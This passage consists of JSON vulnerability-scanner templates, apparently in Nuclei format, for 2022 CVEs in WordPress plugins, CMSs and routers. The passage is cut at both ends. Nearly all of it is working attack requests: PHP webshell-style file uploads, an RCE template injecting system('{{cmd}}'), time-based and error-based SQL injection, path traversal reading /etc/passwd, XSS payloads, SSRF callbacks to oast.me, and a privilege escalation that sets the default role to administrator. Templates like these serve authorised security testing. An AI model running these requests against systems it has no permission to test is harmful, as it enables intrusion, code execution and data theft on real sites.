/wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-4328\"); ?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fe5df26ce4ca0056ffae8854469c282f"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection","severity":"critical"},"requests":[{"raw":["POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"version","part":"body_2","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION 